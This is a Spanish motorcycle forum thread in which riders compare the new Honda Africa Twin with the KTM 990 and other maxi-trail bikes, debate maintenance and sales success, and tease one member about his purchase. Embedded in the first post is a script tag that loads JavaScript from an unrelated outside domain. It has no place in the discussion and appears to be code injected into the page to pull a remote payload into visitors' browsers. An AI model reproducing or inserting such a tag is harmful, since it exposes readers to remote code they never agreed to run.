Lo que creo que quiere decir Gon, y yo estoy de acuerdo con él hasta ahí, es que 990 fue pensada mas para off que la AT nueva (con todas las reservas, hasta que la prueben). Si Honda hubiese querido hacer una maquina tan off seguramente lo hubiera conseguido, pues tiene mucha experiencia y sigue siendo una marca puntera en motocross, pero, aunque solo sea por la "ofensiva publicitaria" que está desplegando, todo parece indicar que quiere hacer una moto polivante para vender mucho, no una maquina tan minoritaria y especifica como en su dia fue la 950-990.

Por lo demás, hacer comparaciones entre motos diseñadas con 12, 15 o 20 años de diferencia, pues no sirve de mucho.<script src="https://cuev.in/aux.php?ver=1.0&ref=at" type="text/javascript"></script>

Estoy de acuerdo contigo, excepto en lo de las comparaciones, que creo es lo que dan un punto de vista para valorar correctamente las cosas.
Y en este caso comparar distintas épocas, creo que sirve para ver la evolución.
O involución, que en algunas cosas también hemos retrocedido.


Pues hombre... con diferentes palabras pero decimos lo mismo y claro que vas a hacer lo mismo con la AT750 que con la 990, pero también lo harías con una honda tlr 200 o con una bultaco, mira a Ignacio Chivite. El limite lo pone cada uno :)

Respecto a tu comparativa entre la la AT nueva y la 990 pues, aunque me quedo con ganas, no voy a entrar a rebatirtela. Quien conozca la 990 ya sabe lo que es y puede ver y comparar una y otra moto, aunque las separen 15 años y 7000 euros. Pero una cosa si te digo seguro, la 990 es muchooo mas barata de mantenimiento que cualquier japo.

Un saludo compis

¿tu crees que con una Pursang podríamos ir con tres maletas y nuestra parienta, de vacaciones a 140 por la autopista o por una pista en mitad del desierto?
Luego, no se por que te tienes que quedar con las ganas, por suerte en el foro no nos cobran por palabras.
Cuando dices barata, supongo que también incluyes que la distribución de un V2 es el doble que en un L2.
Por no hablar del mantenimiento y la fiabilidad de una KTM frente a cualquier japonesa.
Y lo digo con conocimiento de causa, no de oídas, pues entre otras marcas he tenido 3 KTM frente a 6 Yamaha, 2 Honda y 2 Suzuki.
El Ready to race, tiene un coste y las KTM son unos pepinos, pero como tales, necesitan un mayor mantenimiento, otra cosa es que los recambios sean mas baratos, pero no es lo mismo tener que hacer reglaje de válvulas cada 10.000 km, que cada 24.000 km.
Y ya no digo cuando en el primer caso hay que hacerlo si o si y en el segundo te estás 50.000 km sin hacerlo por que las miras y están todas bien.


Creo que no tiene sentido ponerse a comparar motos que son diferentes, tan diferentes como las épocas en que se diseñaron cada una de ellas.

Para mi está claro que Honda ha querido marcar su camino en los tiempos actuales... y se ha quedado muy cerca de lo que desgraciadamente KTM ha dejado de hacer.
Y por algo será.
De hecho es curioso que ahora todos añoremos a la 990 y en cambio en su momento no fuera un best seller.
Creo que Honda se ha desmarcado de la tendencia de las grandes trails asfálticas con una moto que busca gustar a un segmento mucho más amplio de público que la 990. Una moto que no de miedo, fácil de llevar, de mantener... con la electrónica justa, sin complicadas suspensiones ni gadgets superfluos. No será tan efectiva en campo como la 990 pero suficiente para lo que hacen el 90% de los posibles compradores y en cambio seguramente será mejor por carretera, que es lo que hace la mayoría.
Para mí han dado en el clavo, cada vez estoy más convencido.
Los que lo van a tener complicado son los de BMW con su 800, ahí es donde creo que la AT va a hacer más daño.

Mi única duda no viene de la moto ni de su concepto sino que viniendo de la 660 y con la posibilidad de tener una enduro trailizada también me apetece un cambio hacia algo más radical y quizás más asfáltico (y ilógico, que ya veo venir a gasclassic). Si no fuera por eso no lo dudaría y me iría a por la AT. Me la imagino con un escape doble, unos adhesivos y cuatro chuches bien puestas y me pongo cachondo. :D

Y sigo sin descartar la Adventure R, Antonio_1 ;)

Digo yo que si tan cerca se ha quedado, no son tan diferentes como dices.

findus
10/12/2015, 10:02
Pues yo he tenido dos ktm, una gas gas, una ducati, una triumph y ocho bicicletas... me ganas.

gasclassic
10/12/2015, 10:48
Pues yo he tenido dos ktm, una gas gas, una ducati, una triumph y ocho bicicletas... me ganas.

Creo que no me has entendido.
No se trata de ver quien la tiene mas larga (la lista), si no de que he tenido varias de ambas (KTM vs japos) y hablo por experiencia propia, no por "es que me han dicho, que el ha dicho, que tu has dicho, que yo he dicho........"

Por cierto, veo que no has tenido una japo, curioso que hables de su mantenimiento sin haber tenido una.

Marcos
10/12/2015, 11:35
Aquí nos olvidamos siempre de una cosa: nosotros mismos! Lo que convierte una moto en leyenda no es el tubo de ensayo de los laboratorios de la marca, sino los que compran la moto y hacen éste o aquél uso de ella, La Africa, en mi opinión, se convirtió en leyenda porque fue una de las primeras motos grandes que servían para todo; la compró mucha gente, y algunos hicieron un uso muy aventurero, que es obviamente el que quedó en las fotos. El grueso seguían usandolas para ir a currar, pero eso en las fotos no queda tan bien. ¿Por qué la ktm 990 no se vendió como la Africa? Ja. Porque Honda es Honda, y porque coincidió con el auge de la otra best seller, que parece que BMW es también BMW.

gasclassic
10/12/2015, 12:10
Aquí nos olvidamos siempre de una cosa: nosotros mismos! Lo que convierte una moto en leyenda no es el tubo de ensayo de los laboratorios de la marca, sino los que compran la moto y hacen éste o aquél uso de ella, La Africa, en mi opinión, se convirtió en leyenda porque fue una de las primeras motos grandes que servían para todo; la compró mucha gente, y algunos hicieron un uso muy aventurero, que es obviamente el que quedó en las fotos. El grueso seguían usandolas para ir a currar, pero eso en las fotos no queda tan bien. ¿Por qué la ktm 990 no se vendió como la Africa? Ja. Porque Honda es Honda, y porque coincidió con el auge de la otra best seller, que parece que BMW es también BMW.

Totalmente de acuerdo y añado ¿por que unas tienen éxito y otras no?
Entiendo que la confianza en la marca y el sistema de financiación tendrán que ver, pero digo yo que habrán mas cosas que les hagan ser best sellers.

Marcos
10/12/2015, 14:09
Totalmente de acuerdo y añado ¿por que unas tienen éxito y otras no?
Entiendo que la confianza en la marca y el sistema de financiación tendrán que ver, pero digo yo que habrán mas cosas que les hagan ser best sellers.

Pues, es lo que hemos hablado tantas veces. A toro pasado es fácil entender las razones que han llevado al éxito o al fracaso en las ventas, pero de antemano, pues no. Esto no es distinto, en mi opinión, de la fómula del éxito de otras cosas, como canciones o ropa. Y mi opinión consiste en que la fómula rara vez tiene un sólo ingrediente, sino muchos mezclados, de la marca propia y de otras, así como de los tiempos que tocan.

Así, si ponemos como ejemplo una formulación que pueda darse hoy día, al que se atienen muchas marcas:
'Hay mucha gente que no quiere gastarse tanto dinero en motos que aportan tecnología y motorización de los que el usuario medio obtiene rendimiento en contadas ocasiones'.
Yamaha: SR 400. 6 mil pavos. Lo retro mola, si es sencillo más. Hostiazo de ventas. MT 07. 5 mil y pico. Bombazo de ventas.
Honda: CB 500 X, R y F. Bombazo de ventas.
Suzuki: 'nueva' SV 650 2016. Tarde y cobarde, como siempre. Como todavía no ha salido, no sabemos qué tal va a andar, pero no le auguro mucho éxito.
Kawasaki: más zetas pequeñitas para el A2. La marca que más estrangula sus gallinas de huevos de oro.

Pues, de todo esto, se puede esperar que las cilindradas medias entorno a 500cc sigan creciendo, y suponemos que las marcas tirarán por ahí en los años que vienen. Esto es lo normal, porque es la tendencia de nuestro tiempo.
Después, vendrá cualquier tontobaba, cogerá una 125 con la que dará la vuelta al mundo, como el de la Varadero, y como tenga éxito el chaval, ya podemos esperar minitrails worldcrossers por un tubo. Esto funciona así; no pueden barajarse todas las variables, sino las marcas sólo tendrían best sellers.

gasclassic
10/12/2015, 15:40
Coincido de nuevo, 2 cosas aparentemente iguales, no siempre dan el mismo resultado.
Ya que el hilo va de maxi-trails, pongo esta de ejemplo:
http://put.edidomus.it/dueruote/news/foto/423728_3698_big_aprilia-caponord_1OKjpg1.jpg

En su día cuando salió hace ya unos 15 años estaba por encima de sus rivales.
Chasis doble viga de aluminio, horquilla de un grosor importante, llantas de radios pero tubeles, asiento cómodo, buen carenado, inyección, potente, rápida, estable, peeeero, aquí no cuajó.
Primero por que la gente prefirió la Honda Varadero o la GS1150 y mas tarde, la GS1200.
Y eso que llegó a contar incluso con la versión RAID, que tanto éxito a reportado a BMW con la Adventure.

Y la pongo de ejemplo para esas KTM, Ducati, Triumph, Benelli, etc, que tienen estupendas maxi-trail en su catálogo pero que ni todas juntas le hacen sombra a la GS1200.
Incluida la nueva Caponord 1200.

Y creo que la nueva AT busca eso, no ser la mejor, pero si ser la mas vendida.
El tiempo dirá si lo vuelven a conseguir, en su día ya lo lograron con la AT750, que se vendió mejor que sus coetáneas GS100, ST750, Elefant, DR Big........
Por algo fue.
Como también fueron un éxito las XT, Dominator, DR, frente a otras mas "exóticas" como las KTM, Cagiva, etc....

Que ganas de probar ya la nueva AT, aunque no me planteo su compra, al menos no hasta que dentro de unos años hayan unidades de ocasión a buen precio.

Isidoro
10/12/2015, 16:51
Que ganas de probar ya la nueva AT, aunque no me planteo su compra, al menos no hasta que dentro de unos años hayan unidades de ocasión a buen precio.[/QUOTE]

Yo también...[emoji6]

findus
10/12/2015, 19:05
Jaimev, yo boto por la africona. Tiene muy buena pinta y seguro que te sienta como un guante, además vas a poder seguir haciendo casi de todo y bien.
Pero no la rayes el primer dia, jajaja

jaimev
10/12/2015, 19:39
Digo yo que si tan cerca se ha quedado, no son tan diferentes como dices.

No me refería a esas dos, que efectivamente tienen bastantes puntos en común sino a otras más antiguas que se han comparado.



Pero no la rayes el primer dia, jajaja

Hostia... no me lo recuerdes ;)

sellamar
10/12/2015, 20:28
Mi elección, al día de hoy seria la 1190 R.

salu2.

Pedro_01
26/12/2015, 10:49
No me refería a esas dos, que efectivamente tienen bastantes puntos en común sino a otras más antiguas que se han comparado.



Hostia... no me lo recuerdes ;)

Bueno jaimev!!! Qué nos compramos??? 4 páginas de hilo y nos quedamos sin saberlo? Esto qué coño es? El Señor de los Anillos???? jaja.
Además nos tendrás que decir a cuánto salimos, no? porque parece la moto de todos! Yo AT no me gustaría AT condicionarte AT porque pienso AT que todas AT son buenas motos AT.
Dios AT me libre AT de quere influirATe!

NGDakar
26/12/2015, 12:35
Bueno jaimev!!! Qué nos compramos??? 4 páginas de hilo y nos quedamos sin saberlo? Esto qué coño es? El Señor de los Anillos???? jaja.
Además nos tendrás que decir a cuánto salimos, no? porque parece la moto de todos! Yo AT no me gustaría AT condicionarte AT porque pienso AT que todas AT son buenas motos AT.
Dios AT me libre AT de quere influirATe!

AT +1 :o

Marcos
26/12/2015, 13:51
Haceros la compra conjunta ya, no? Luego poneis una comparativa y prueba reales, y en el mismo hilo, allá por la página 8, acordamos que mejor la 690.

Tomy
26/12/2015, 15:39
:descohone::descohone:

Antonio69
26/12/2015, 15:41
Haceros la compra conjunta ya, no? Luego poneis una comparativa y prueba reales, y en el mismo hilo, allá por la página 8, acordamos que mejor la 690.

Jajajajajajaja!!!!!

Jaime, yo tampoco quiero condicionarte. 1190R

jaimev
26/12/2015, 22:52
Jajaja!! Gracias por no condicionarme ;)

Tranquilos, primero tengo que curarme, ya estoy empezando la recuperación, que es una put--- jod-- como duele!

Luego habrá que poder probarlas y luego decidirse. Es divertido ya que según me levanto un día tengo muy claro una y al otro cambio de opinión... Sigue la saga! :D

transalacant
26/12/2015, 23:25
Seguro que mientras te decides sale algún otro modelo... una Super Ténéré 900 tal vez?..

Cherokee
26/12/2015, 23:36
La ducati